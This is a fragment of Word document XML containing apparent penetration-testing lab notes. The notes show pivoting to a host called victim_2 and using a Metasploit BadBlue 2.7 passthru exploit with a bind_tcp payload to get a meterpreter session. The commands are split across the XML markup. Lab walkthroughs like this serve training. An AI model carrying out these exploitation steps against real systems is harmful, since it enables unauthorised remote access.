        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>accesss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056709C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the port 80 of victim_2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0056709C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>by :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="275A1675" w14:textId="1F0D5403" w:rsidR="0056709C" w:rsidRDefault="0056709C">
      <w:r>
        <w:t>Open the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E29902" w14:textId="05825AAC" w:rsidR="0056709C" w:rsidRDefault="0056709C">
      <w:r>
        <w:t>Victim_2:1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D724E" w14:textId="77777777" w:rsidR="0056709C" w:rsidRDefault="0056709C"/>
    <w:p w14:paraId="760B8F00" w14:textId="0D874644" w:rsidR="00FD3008" w:rsidRPr="00FD3008" w:rsidRDefault="00FD3008">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD5A0D" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="698AA5FE" w14:textId="4E57C8A2" w:rsidR="0056709C" w:rsidRDefault="0056709C">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF0958" w14:textId="63FB7185" w:rsidR="0056709C" w:rsidRDefault="0056709C">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF491D" w14:textId="1F2B0062" w:rsidR="0056709C" w:rsidRDefault="0056709C">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB7825" w14:textId="7649AE62" w:rsidR="0056709C" w:rsidRDefault="00FD3008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bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2894F560" w14:textId="4CC3F541" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we used the port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3F28B" w14:textId="7CA8419E" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>RHOSTS victim</w:t>
      </w:r>
      <w:r>
        <w:t>_02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15A6C7" w14:textId="3BFCF8E4" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the route is added to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC1947" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="504E8AAD" w14:textId="702AFB6B" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t>Set LPORT 4433</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC9EC5" w14:textId="358E455C" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>make</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it differ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the port that we used previously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBB781" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="7520281A" w14:textId="1370F433" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF1718" w14:textId="65A7B7F4" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve"># we get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEBCD9A" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="38EAC4D4" w14:textId="562F4787" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80E098" w14:textId="4839F074" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve"># we get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the victim_02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6684CD" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="5E3C5DC5" w14:textId="3E99F7D1" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>n victim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_2 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614A503" w14:textId="718E5F70" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the session (id) to the victim_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D66708" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="5E34DCB0" w14:textId="60E452A6" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:r>
        <w:t>Sessions id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF9FE9" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="6DE0634A" w14:textId="7988C331" w:rsidR="00FD3008" w:rsidRDefault="00FD3008">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="326C9605" w14:textId="598455BF" w:rsidR="00FD3008" w:rsidRPr="00FD3008" w:rsidRDefault="00FD3008">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A56FCE8" w14:textId="77777777" w:rsidR="00FD3008" w:rsidRDefault="00FD3008"/>
    <w:p w14:paraId="07AA73BB" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="081AF96A" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:sectPr w:rsidR="00AC1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2DA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C37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815EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CF4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660824">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="165873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C6"/>
    <w:rsid w:val="000C6DDB"/>
    <w:rsid w:val="00150B4D"/>
    <w:rsid w:val="001B46E1"/>
    <w:rsid w:val="002364DF"/>
    <w:rsid w:val="00341CCD"/>
    <w:rsid w:val="004675D5"/>
    <w:rsid w:val="00493D78"/>
    <w:rsid w:val="00535488"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="0056709C"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007646FA"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00AC1763"/>
    <w:rsid w:val="00EA34F2"/>
    <w:rsid w:val="00FB0EC6"/>
    <w:rsid w:val="00FD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8B7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B42739FF-B14F-4D75-B13A-FB8028BD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307</Words>
  <Characters>2768</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>692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2025-10-17T04:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T05:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>